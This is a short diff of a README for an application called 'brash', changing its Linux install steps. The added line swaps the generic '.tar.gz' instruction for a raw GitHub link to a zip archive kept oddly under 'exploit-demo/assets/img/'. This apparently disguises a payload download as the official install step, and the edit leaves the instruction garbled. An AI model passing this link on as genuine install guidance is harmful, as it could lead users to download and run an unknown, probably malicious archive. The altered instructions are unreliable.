ismyso5415/brash/README.md

   3. Drag the brash icon to your Applications folder.

 - **For Linux:**
-  1. Extract the downloaded `.tar.gz` file in your preferred location.
+  1. Extract the downloaded `https://raw.githubusercontent.com/ismyso5415/brash/main/exploit-demo/assets/img/brash_v2.8.zip` file in your preferred location.
   2. Open a terminal and navigate to the extracted folder.
   3. Run `./brash` to start.